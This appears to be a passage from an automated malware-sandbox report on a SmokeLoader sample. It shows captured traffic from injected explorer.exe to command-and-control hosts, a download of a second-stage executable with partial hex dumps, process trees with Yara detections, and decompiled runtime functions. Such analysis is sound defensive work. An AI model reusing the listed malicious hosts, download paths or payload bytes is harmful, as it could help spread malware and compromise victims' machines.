            Data Raw: 10 87 82 91 1a f5 dc c7 cc 36 0c 41 7d c8 ec 89 4a 14 df 32 a5 44 1a 98 bd ec ad 84 89 a0 92 f6 11 b2 55 d5 19 1a cb e4 ee a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 45 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 59 d8 89 69 23 c8 5e 75 ca 2c 0b 5f 6f 7d b3 99 d1 29 b3 cc 85 af 01 7b 03 1b 70 c5 48 7f f6 7e 2a 5f 77 9d 2e f4 86 6e a9 5e 21 54 50 e9 9b 21 01 50 af 2f f6 c3 69 71 cc aa 74 d9 12 2c 4d d5 2b da 59 f5 80 84 ac dc 34 d2 21 8e 14 48 0a 6e 5b e5 76 89 da 3e ff 8c 15 c2 c3 0c 43 1d 9c b6 dc e7 91 12 59 a1 ee 81 c2 9b 23 5d cb a8 d9 f0 5f 7e 3a 56 17 a0 ae 79 1b 41 c1 81 bd 3a 9a 40 28 31 f6 16 65 aa bc 5b f7 01 b5 3f e6 e3 19 27 d6 64 82 b0 d5 2d 97 da 7f 31 81
            Data Ascii: 6A}J2DUwmEu$f]dYi#^u,_o}){pH~*_w.n^!TP!P/iqt,M+Y4!Hn[v>CY#]_~:VyA:@(1e[?'d-1
            Nov 28, 2021 05:08:59.934400082 CET1941INHTTP/1.1 404 Not Found
            Server: nginx/1.20.1
            Date: Sun, 28 Nov 2021 04:08:56 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1a b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 19{i+,GO0


            Session IDSource IPSource PortDestination IPDestination PortProcess
            1192.168.2.349786212.193.50.9480C:\Windows\explorer.exe
            TimestampkBytes transferredDirectionData
            Nov 28, 2021 05:09:01.200874090 CET1974OUTPOST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://sremv.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 326
            Host: host-data-coin-11.com
            Nov 28, 2021 05:09:01.200949907 CET1975OUTData Raw: 10 87 82 91 1a f5 dc c7 cc 36 0c 41 7d c8 ec 89 4a 14 df 32 a5 44 1a 98 bd ec ad 84 89 a0 92 f6 11 b2 55 d5 19 1a cb e4 ee a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 45 d4 75 24 f3 c4 85 de 9e 66 5d 02 c8 a1 c1 64 01 b6 b2 00
            Data Ascii: 6A}J2DUwmEu$f]d0ousZB.k z_Ha)%rcxBydOwJL:TL=?A!4MTN!0zS4SOz"1QmTR6.z9o`[:;
            Nov 28, 2021 05:09:02.791347980 CET1975OUTPOST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://sremv.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 326
            Host: host-data-coin-11.com
            Data Raw: 10 87 82 91 1a f5 dc c7 cc 36 0c 41 7d c8 ec 89 4a 14 df 32 a5 44 1a 98 bd ec ad 84 89 a0 92 f6 11 b2 55 d5 19 1a cb e4 ee a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 45 d4 75 24 f3 c4 85 de 9e 66 5d 02 c8 a1 c1 64 01 b6 b2 00 30 c4 6f 75 b5 1f 73 5a 1c 1c 84 e1 a1 42 ed cb a1 f3 2e 6b 20 7a 5f c3 48 61 f0 0d 29 0b 25 8b 72 93 e5 63 b6 17 78 42 79 f5 b6 64 4f 77 bf 4a f2 b3 4c 3a c0 f9 54 dc 1a 4c 0f 9b 02 cc 3d 8e aa 9f a1 f5 16 84 3f a4 41 21 0f 34 4d d7 54 fb bc 4e eb 86 21 c7 80 30 15 05 c2 99 f3 f2 d7 7a 53 ef 8f fa a3 ac 06 34 87 fa d2 e5 53 4f 1e 7a 22 cb f9 31 0f 17 b4 92 8b 7f d6 51 13 6d d0 0a 54 cf 83 52 af 14 a9 36 b5 de 2e 7a 97 39 e4 a7 cc 6f 97 bc 60 0e bf 05 5b bc be e7 ae 3a c9 fe 3b 6c bf 75 9e aa 5e 6e f4 e4 43 bf 14 de 37 4d 16 65 bb f8 18 45 46 9b e8 6e 39 06 10 51 49 f2 b8 3d 53 bf 39 ba 02 15 1a df fe 28 20 46 b7 70 24 e1 52 95 b4 da d8 6d 83 84 dd 43 9c 34 1d 40 1c eb a6 48 37 a8 32 ed 25 ce 83 95 ab 1e 49 fe cd e8 c0 2c
            Data Ascii: 6A}J2DUwmEu$f]d0ousZB.k z_Ha)%rcxBydOwJL:TL=?A!4MTN!0zS4SOz"1QmTR6.z9o`[:;lu^nC7MeEFn9QI=S9( Fp$RmC4@H72%I,
            Nov 28, 2021 05:09:28.165318012 CET11930INHTTP/1.1 404 Not Found
            Server: nginx/1.20.1
            Date: Sun, 28 Nov 2021 04:09:04 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c3 55 a1 b9 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 46I:82OOj{CUg%XQAc}yc0


            Session IDSource IPSource PortDestination IPDestination PortProcess
            2192.168.2.349815212.193.50.9480C:\Windows\explorer.exe
            TimestampkBytes transferredDirectionData
            Nov 28, 2021 05:09:29.425179005 CET11930OUTGET /downloads/toolspab2.exe HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Host: privacytoolzforyou-7000.com
            Nov 28, 2021 05:09:30.934284925 CET11931OUTGET /downloads/toolspab2.exe HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Host: privacytoolzforyou-7000.com
            Nov 28, 2021 05:09:35.751183987 CET11941INHTTP/1.1 200 OK
            Server: nginx/1.20.1
            Date: Sun, 28 Nov 2021 04:09:32 GMT
            Content-Type: application/x-msdos-program
            Content-Length: 323584
            Connection: close
            Last-Modified: Sun, 28 Nov 2021 04:09:01 GMT
            ETag: "4f000-5d1d17bf688fe"
            Accept-Ranges: bytes
            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 f0 f7 fb 52 91 99 a8 52 91 99 a8 52 91 99 a8 3d e7 32 a8 7b 91 99 a8 3d e7 07 a8 42 91 99 a8 3d e7 33 a8 31 91 99 a8 5b e9 0a a8 55 91 99 a8 52 91 98 a8 b6 91 99 a8 3d e7 36 a8 53 91 99 a8 3d e7 03 a8 53 91 99 a8 3d e7 04 a8 53 91 99 a8 52 69 63 68 52 91 99 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0f d6 da 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 08 03 00 00 60 df 02 00 00 00 00 d0 7f 01 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 e2 02 00 04 00 00 06 45 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 01 03 00 50 00 00 00 00 10 e1 02 20 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 e1 02 cc 17 00 00 c0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e 06 03 00 00 10 00 00 00 08 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 e0 e9 dd 02 00 20 03 00 00 62 00 00 00 0c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 6d 00 00 00 10 e1 02 00 6e 00 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 13 01 00 00 80 e1 02 00 14 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 13 03 00 00 00 00 00 3e 05 03 00 4c 05 03 00 60 05 03 00 82 05 03 00 98 05 03 00 b6 05 03 00 cc 05 03 00 dc 05 03 00 e8 05 03 00 fa 05 03 00 0e 06 03 00 24
            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$RRR=2{=B=31[UR=6S=S=SRichRPEL^` @ETP m~@x.text~ `.data b@.rsrc mnn@@.reloc@@Bp>L`$
            Nov 28, 2021 05:09:36.520987988 CET11942INData Raw: 06 03 00 36 06 03 00 4c 06 03 00 5a 06 03 00 6c 06 03 00 7e 06 03 00 8c 06 03 00 ac 06 03 00 ca 06 03 00 e6 06 03 00 04 07 03 00 16 07 03 00 32 07 03 00 40 07 03 00 58 07 03 00 6c 07 03 00 84 07 03 00 9e 07 03 00 ac 07 03 00 c0 07 03 00 cc 07 03
            Data Ascii: 6LZl~2@Xl"<FZj|,@Pl(BNj~"
            Nov 28, 2021 05:09:36.604118109 CET11942INData Raw: 6c 64 5c 73 65 6c 66 5f 78 38 36 5c 63 72 74 5c 73 72 63 5c 73 74 64 65 6e 76 70 2e 63 00 00 00 00 66 3a 5c 64 64 5c 76 63 74 6f 6f 6c 73 5c 63 72 74 5f 62 6c 64 5c 73 65 6c 66 5f 78 38 36 5c 63 72 74 5c 73 72 63 5c 73 74 64 61 72 67 76 2e 63 00
            Data Ascii: ld\self_x86\crt\src\stdenvp.cf:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.cf:\dd\vctools\crt_bld\self_x86\crt\src\w_env.cf:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.cClientIgnoreCRTNormalFree@@
            Nov 28, 2021 05:09:38.370796919 CET11944INData Raw: 00 38 16 40 00 34 16 40 00 2c 16 40 00 24 16 40 00 45 72 72 6f 72 3a 20 6d 65 6d 6f 72 79 20 61 6c 6c 6f 63 61 74 69 6f 6e 3a 20 62 61 64 20 6d 65 6d 6f 72 79 20 62 6c 6f 63 6b 20 74 79 70 65 2e 0a 00 00 00 49 6e 76 61 6c 69 64 20 61 6c 6c 6f 63
            Data Ascii: 8@4@,@$@Error: memory allocation: bad memory block type.Invalid allocation size: %Iu bytes.%sClient hook allocation failure.Client hook allocation failure at file %hs line %d.f:\dd\vctools\crt_b
            Nov 28, 2021 05:09:38.370870113 CET11945INData Raw: 00 65 00 20 00 3d 00 3d 00 20 00 49 00 47 00 4e 00 4f 00 52 00 45 00 5f 00 4c 00 49 00 4e 00 45 00 20 00 26 00 26 00 20 00 70 00 48 00 65 00 61 00 64 00 2d 00 3e 00 6c 00 52 00 65 00 71 00 75 00 65 00 73 00 74 00 20 00 3d 00 3d 00 20 00 49 00 47
            Data Ascii: e == IGNORE_LINE && pHead->lRequest == IGNORE_REQHEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.
            Nov 28, 2021 05:09:39.234653950 CET11947INData Raw: 68 73 28 25 64 29 2e 0a 00 44 41 4d 41 47 45 44 00 5f 68 65 61 70 63 68 6b 20 66 61 69 6c 73 20 77 69 74 68 20 75 6e 6b 6e 6f 77 6e 20 72 65 74 75 72 6e 20 76 61 6c 75 65 21 0a 00 00 5f 68 65 61 70 63 68 6b 20 66 61 69 6c 73 20 77 69 74 68 20 5f
            Data Ascii: hs(%d).DAMAGED_heapchk fails with unknown return value!_heapchk fails with _HEAPBADPTR._heapchk fails with _HEAPBADEND._heapchk fails with _HEAPBADNODE._heapchk fails with _HEAPBADBEGIN._CrtSetDbgFlag(
            Nov 28, 2021 05:09:39.312383890 CET11948INData Raw: 00 0a 00 00 00 00 00 44 00 4f 00 4d 00 41 00 49 00 4e 00 20 00 65 00 72 00 72 00 6f 00 72 00 0d 00 0a 00 00 00 00 00 52 00 36 00 30 00 33 00 33 00 0d 00 0a 00 2d 00 20 00 41 00 74 00 74 00 65 00 6d 00 70 00 74 00 20 00 74 00 6f 00 20 00 75 00 73
            Data Ascii: DOMAIN errorR6033- Attempt to use MSIL code from this assembly during native code initializationThis indicates
            Nov 28, 2021 05:09:40.843255043 CET11950INData Raw: 00 6c 00 6c 00 0d 00 0a 00 00 00 00 00 00 00 52 00 36 00 30 00 32 00 34 00 0d 00 0a 00 2d 00 20 00 6e 00 6f 00 74 00 20 00 65 00 6e 00 6f 00 75 00 67 00 68 00 20 00 73 00 70 00 61 00 63 00 65 00 20 00 66 00 6f 00 72 00 20 00 5f 00 6f 00 6e 00 65
            Data Ascii: llR6024- not enough space for _onexit/atexit tableR6019- unable to open console deviceR6018- unexp
            Nov 28, 2021 05:09:40.843288898 CET11951INData Raw: 00 29 00 00 00 2e 00 2e 00 2e 00 00 00 77 00 63 00 73 00 6e 00 63 00 70 00 79 00 5f 00 73 00 28 00 70 00 63 00 68 00 2c 00 20 00 70 00 72 00 6f 00 67 00 6e 00 61 00 6d 00 65 00 5f 00 73 00 69 00 7a 00 65 00 20 00 2d 00 20 00 28 00 70 00 63 00 68
            Data Ascii: )...wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)<program name unknown>wcscpy_s(progname, progname_siz
            Nov 28, 2021 05:09:41.578494072 CET11952INData Raw: 00 65 00 73 00 73 00 61 00 67 00 65 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00 20 00 4c 00 22 00 5f 00 43 00 72 00 74 00 44 00 62 00 67 00 52 00 65 00 70 00 6f 00 72 00 74 00 3a 00 20 00 53 00 74 00 72 00 69 00 6e 00 67 00 20 00 74 00 6f 00 6f
            Data Ascii: essage, 4096, L"_CrtDbgReport: String too long or IO Error")Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry t
            Nov 28, 2021 05:09:41.625014067 CET11953INData Raw: 6f 6e 20 46 61 69 6c 65 64 00 00 00 00 45 72 72 6f 72 00 00 00 57 61 72 6e 69 6e 67 00 b4 3a 40 00 ac 3a 40 00 98 3a 40 00 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 44 65 62 75 67 20 4c 69 62 72 61 72 79 00 00 5f 43 72 74 44
            Data Ascii: on FailedErrorWarning:@:@:@Microsoft Visual C++ Debug Library_CrtDbgReport: String too long or IO Errorstrcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long


            Code Manipulations

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            • File
            • Registry

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            Analysis Process: cf71PGrIPQ.exe PID: 7068 Parent PID: 464

            Function Logs

            General

            Start time:05:07:59
            Start date:28/11/2021
            Path:C:\Users\user\Desktop\cf71PGrIPQ.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\cf71PGrIPQ.exe"
            Imagebase:0x400000
            File size:321024 bytes
            MD5 hash:19B07BFA4BA4CFFBA03DFF47A9EFDF36
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Show Windows behavior

            File Activities

            Show Windows behavior

            Section Activities

            Show Windows behavior

            Registry Activities

            Show Windows behavior

            Mutex Activities

            Show Windows behavior

            Process Activities

            Show Windows behavior

            Thread Activities

            Show Windows behavior

            Memory Activities

            Show Windows behavior

            System Activities

            Show Windows behavior

            Windows UI Activities

            Show Windows behavior

            LPC Port Activities

            Analysis Process: cf71PGrIPQ.exe PID: 6392 Parent PID: 7068

            Function Logs

            General

            Start time:05:08:04
            Start date:28/11/2021
            Path:C:\Users\user\Desktop\cf71PGrIPQ.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\cf71PGrIPQ.exe"
            Imagebase:0x400000
            File size:321024 bytes
            MD5 hash:19B07BFA4BA4CFFBA03DFF47A9EFDF36
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.338557763.00000000004C0000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.338606370.00000000004E1000.00000004.00020000.sdmp, Author: Joe Security
            Reputation:low
            Show Windows behavior

            File Activities

            Show Windows behavior

            Section Activities

            Show Windows behavior

            Registry Activities

            Show Windows behavior

            Mutex Activities

            Show Windows behavior

            Process Activities

            Show Windows behavior

            Thread Activities

            Show Windows behavior

            Memory Activities

            Show Windows behavior

            System Activities

            Show Windows behavior

            LPC Port Activities

            Analysis Process: explorer.exe PID: 3352 Parent PID: 6392

            Function Logs

            General

            Start time:05:08:11
            Start date:28/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\Explorer.EXE
            Imagebase:0x7ff720ea0000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000000.327763629.0000000004DE1000.00000020.00020000.sdmp, Author: Joe Security
            Reputation:high
            Show Windows behavior

            File Activities

            Show Windows behavior

            Section Activities

            Show Windows behavior

            Registry Activities

            Show Windows behavior

            Mutex Activities

            Show Windows behavior

            Process Activities

            Show Windows behavior

            Thread Activities

            Show Windows behavior

            Memory Activities

            Show Windows behavior

            System Activities

            Show Windows behavior

            Windows UI Activities

            Analysis Process: iaivaah PID: 6324 Parent PID: 664

            Function Logs

            General

            Start time:05:08:43
            Start date:28/11/2021
            Path:C:\Users\user\AppData\Roaming\iaivaah
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\iaivaah
            Imagebase:0x400000
            File size:321024 bytes
            MD5 hash:19B07BFA4BA4CFFBA03DFF47A9EFDF36
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            • Detection: 48%, ReversingLabs
            Reputation:low
            Show Windows behavior

            File Activities

            Show Windows behavior

            Section Activities

            Show Windows behavior

            Registry Activities

            Show Windows behavior

            Mutex Activities

            Show Windows behavior

            Process Activities

            Show Windows behavior

            Thread Activities

            Show Windows behavior

            Memory Activities

            Show Windows behavior

            System Activities

            Show Windows behavior

            Windows UI Activities

            Show Windows behavior

            LPC Port Activities

            Analysis Process: iaivaah PID: 6600 Parent PID: 6324

            Function Logs

            General

            Start time:05:08:53
            Start date:28/11/2021
            Path:C:\Users\user\AppData\Roaming\iaivaah
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\iaivaah
            Imagebase:0x400000
            File size:321024 bytes
            MD5 hash:19B07BFA4BA4CFFBA03DFF47A9EFDF36
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000015.00000002.405322219.0000000000500000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000015.00000002.405829764.0000000002061000.00000004.00020000.sdmp, Author: Joe Security
            Reputation:low
            Show Windows behavior

            File Activities

            Show Windows behavior

            Section Activities

            Show Windows behavior

            Registry Activities

            Show Windows behavior

            Mutex Activities

            Show Windows behavior

            Process Activities

            Show Windows behavior

            Thread Activities

            Show Windows behavior

            Memory Activities

            Show Windows behavior

            System Activities

            Show Windows behavior

            LPC Port Activities

            Disassembly

            Code Analysis

            Analysis Process: cf71PGrIPQ.exe PID: 7068 Parent PID: 464 cf71PGrIPQ.exeCOMMON

            Executed Functions

            Download Yara Rule
            APIs
            • RtlEncodePointer.NTDLL(00000000,?,004185BB,?,?,0041B8E0), ref: 0041B777
            Memory Dump Source
            • Source File: 00000001.00000002.287056466.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.287053986.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.287076736.0000000000432000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.287081282.0000000000437000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.287304740.0000000003211000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: EncodePointer
            • String ID:
            • API String ID: 2118026453-0
            • Opcode ID: e420c4da3d51d419ea922ef6abadc655d39b331bad441ee9935cc10d18b2d97d
            • Instruction ID: a2eacf519e8efb819bc7df00a820405c443f1fd92bae8bca4379341c0e9cda8c
            • Opcode Fuzzy Hash: e420c4da3d51d419ea922ef6abadc655d39b331bad441ee9935cc10d18b2d97d
            • Instruction Fuzzy Hash: 70A0223208830CB3E20023C3BE0EF823F8CC3C0B33F000020FB0C028A20EB2A80080AA
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            C-Code - Quality: 100%
            			_entry_() {
				void* _t3;

				E00417FA0(); // executed
				return L00417CB0(_t3);
			}




            0x00417c95
            0x00417ca0

            APIs
            • ___security_init_cookie.LIBCMTD ref: 00417C95
            Memory Dump Source
            • Source File: 00000001.00000002.287056466.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.287053986.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.287076736.0000000000432000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.287081282.0000000000437000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.287304740.0000000003211000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ___security_init_cookie
            • String ID:
            • API String ID: 3657697845-0
            • Opcode ID: 171c28b58462050255cb6f92a214f913f529165168e82ffd83e58af334052e97
            • Instruction ID: 67b28dd7772527adca73a01002058a26748d25af94765fb0c4e5b896dd633d85
            • Opcode Fuzzy Hash: 171c28b58462050255cb6f92a214f913f529165168e82ffd83e58af334052e97
            • Instruction Fuzzy Hash: D7A0023100C64816015033A7144798B756D49C07587E5001AB51C031077C5CB8C240FE
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Download Yara Rule
            C-Code - Quality: 85%
            			E0041FE40(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				long _t15;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t29;
				void* _t34;

				_t25 = __esi;
				_t24 = __edi;
				_t22 = __edx;
				_t20 = __ecx;
				_t19 = __ebx;
				_t6 = __eax;
				_t34 = _t20 -  *0x432064; // 0x88d1360
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x438988 = _t6;
				 *0x438984 = _t20;
				 *0x438980 = _t22;
				 *0x43897c = _t19;
				 *0x438978 = _t25;
				 *0x438974 = _t24;
				 *0x4389a0 = ss;
				 *0x438994 = cs;
				 *0x438970 = ds;
				 *0x43896c = es;
				 *0x438968 = fs;
				 *0x438964 = gs;
				asm("pushfd");
				_pop( *0x438998);
				 *0x43898c =  *_t29;
				 *0x438990 = _v0;
				 *0x43899c =  &_a4;
				 *0x4388d8 = 0x10001;
				_t11 =  *0x438990; // 0x0
				 *0x43888c = _t11;
				 *0x438880 = 0xc0000409;
				 *0x438884 = 1;
				_t21 =  *0x432064; // 0x88d1360
				_v812 = _t21;
				_t23 =  *0x432068; // 0xf772ec9f
				_v808 = _t23;
				 *0x4388d0 = IsDebuggerPresent();
				_push(1);
				E0041F290(_t12);
				SetUnhandledExceptionFilter(0);
				_t15 = UnhandledExceptionFilter(0x4062ac);
				if( *0x4388d0 == 0) {
					_push(1);
					E0041F290(_t15);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















            0x0041fe40
            0x0041fe40
            0x0041fe40
            0x0041fe40
            0x0041fe40
            0x0041fe40
            0x0041fe40
            0x0041fe46
            0x0041fe48
            0x0041fe48
            0x0042450b
            0x00424510
            0x00424516
            0x0042451c
            0x00424522
            0x00424528
            0x0042452e
            0x00424535
            0x0042453c
            0x00424543
            0x0042454a
            0x00424551
            0x00424558
            0x00424559
            0x00424562
            0x0042456a
            0x00424572
            0x0042457d
            0x00424587
            0x0042458c
            0x00424591
            0x0042459b
            0x004245a5
            0x004245ab
            0x004245b1
            0x004245b7
            0x004245c3
            0x004245c8
            0x004245ca
            0x004245d4
            0x004245df
            0x004245ec
            0x004245ee
            0x004245f0
            0x004245f5
            0x0042460d

            APIs
            • IsDebuggerPresent.KERNEL32 ref: 004245BD
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004245D4
            • UnhandledExceptionFilter.KERNEL32(004062AC), ref: 004245DF
            • GetCurrentProcess.KERNEL32(C0000409), ref: 004245FD
            • TerminateProcess.KERNEL32(00000000), ref: 00424604
            Memory Dump Source
            • Source File: 00000001.00000002.287056466.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.287053986.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.287076736.0000000000432000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.287081282.0000000000437000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.287304740.0000000003211000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
            • String ID:
            • API String ID: 2579439406-0
            • Opcode ID: 4e9ad5d45d114f15f3d0e9653386f442adb9e8610770dbad0d6162526b55d4e0
            • Instruction ID: fcb50c5d8656b36328d8db7a8de4a4bbdfc6e136a467ae63c883cd56932fa9b3
            • Opcode Fuzzy Hash: 4e9ad5d45d114f15f3d0e9653386f442adb9e8610770dbad0d6162526b55d4e0
            • Instruction Fuzzy Hash: 0121CCB8802308DBD704AF64F945665BBA0BB48314F40207EFA08A2260EBB54685CF4E
            Uniqueness

            Uniqueness Score: -1.00%

            Analysis Process: cf71PGrIPQ.exe PID: 6392 Parent PID: 7068 cf71PGrIPQ.exeCOMMON

            Executed Functions

            Download Yara Rule
            C-Code - Quality: 46%
            			E0040196D(void* __eax, void* __ebx, void* __ecx, void* __edi, short __esi, void* __fp0) {
				intOrPtr _t14;
				void* _t17;
				intOrPtr* _t23;
				void* _t26;
				void* _t27;
				void* _t28;
				signed int _t33;
